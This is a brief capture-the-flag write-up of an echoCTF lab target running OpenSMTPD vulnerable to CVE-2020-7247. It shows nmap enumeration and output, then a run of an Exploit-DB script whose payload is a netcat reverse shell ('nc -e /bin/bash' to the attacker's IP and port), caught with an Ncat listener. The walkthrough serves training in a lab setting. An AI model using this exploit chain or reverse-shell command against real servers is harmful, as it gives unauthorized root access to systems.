This is a target running a vulnerable OpenSMTPD instance of CVE-2020-7247.
A vulnerability discovered in OpenSMTPD, OpenBSD’s mail server was exploitable since May 2018 (commit a8e222352f, “switch smtpd to new grammar”) and allows an attacker to execute arbitrary shell commands, as root.
Enumeration With Nmap
nmap -p- --min-rate 10000 -oA nmap/allports -v 10.0.100.33
# Nmap 7.91 scan initiated Sat Dec 4 09:26:10 2021 as: nmap -p- --min-rate 10000 -oA nmap/allports -v 10.0.100.33 Increasing send delay for 10.0.100.33 from 0 to 5 due to 230 out of 766 dropped probes since last increase. Warning: 10.0.100.33 giving up on port because retransmission cap hit (10). Increasing send delay for 10.0.100.33 from 640 to 1000 due to 108 out of 358 dropped probes since last increase. Nmap scan report for 10.0.100.33 Host is up (0.15s latency). Not shown: 40969 closed ports, 24565 filtered ports PORT STATE SERVICE 25/tcp open smtp Read data files from: /usr/bin/../share/nmap # Nmap done at Sat Dec 4 09:27:14 2021 -- 1 IP address (1 host up) scanned in 64.35 seconds
What we always do let use some default nmap script and service detection on it.
nmap -sC -sV -oA nmap/normal -p 25 10.0.100.33
# Nmap 7.91 scan initiated Sat Dec 4 09:28:37 2021 as: nmap -sC -sV -oA nmap -p 25 10.0.100.33 Nmap scan report for 10.0.100.33 Host is up (0.21s latency). PORT STATE SERVICE VERSION 25/tcp open smtp OpenSMTPD | smtp-commands: CVE-2020-7247.echocity-f.com Hello nmap.scanme.org [10.10.0.186], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP, |_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact email@example.com 2.0.0 with full details 2.0.0 End of HELP info Service Info: Host: CVE-2020-7247.echocity-f.com Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Dec 4 09:28:45 2021 -- 1 IP address (1 host up) scanned in 7.42 seconds
Now let do some research on google and got an exploit on exploit-db already.
Smooth let run it.
┌──(muzec㉿Muzec-Security)-[~/Documents/echoctf/CVE-2020-7247] └─$ python3 47984.py 10.0.100.33 25 'nc -e /bin/bash 10.10.0.186 1337' [*] OpenSMTPD detected [*] Connected, sending payload [*] Payload sent [*] Done
Now let check Ncat listener.
We are done.
Greeting From Muzec